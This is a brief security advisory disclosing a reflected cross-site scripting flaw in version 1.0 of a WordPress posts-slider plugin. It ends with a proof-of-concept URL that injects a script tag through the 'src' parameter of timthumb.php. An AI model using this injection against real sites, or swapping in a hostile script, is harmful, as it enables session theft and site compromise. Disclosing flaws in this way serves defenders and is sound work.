WordPress IGIT Posts Slider Widget 1.0 suffers from a cross site scripting vulnerability.
bbe2057392caf862c9d3e71dd9caad522ffd2b1ec179adadef214733105d42e1
------------------------------------------------------------------------
Software................WordPress IGIT Posts Slider Widget 1.0
Vulnerability...........Reflected Cross-site Scripting
Download................http://www.hackingethics.com/blog/wordpress-plugins/igit-posts-slider-widget/
Release Date............2/23/2011
Tested On...............Windows 7 + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
------------------------------------------------------------------------
--Description--
A reflected cross-site scripting vulnerability in WordPress IGIT Posts
Slider Widget 1.0 can be exploited to execute arbitrary JavaScript.
--PoC--
http://localhost/wordpress/wp-content/plugins/igit-posts-slider-widget/timthumb.php?src=%3Cscript%3Ealert(0)%3C/script%3E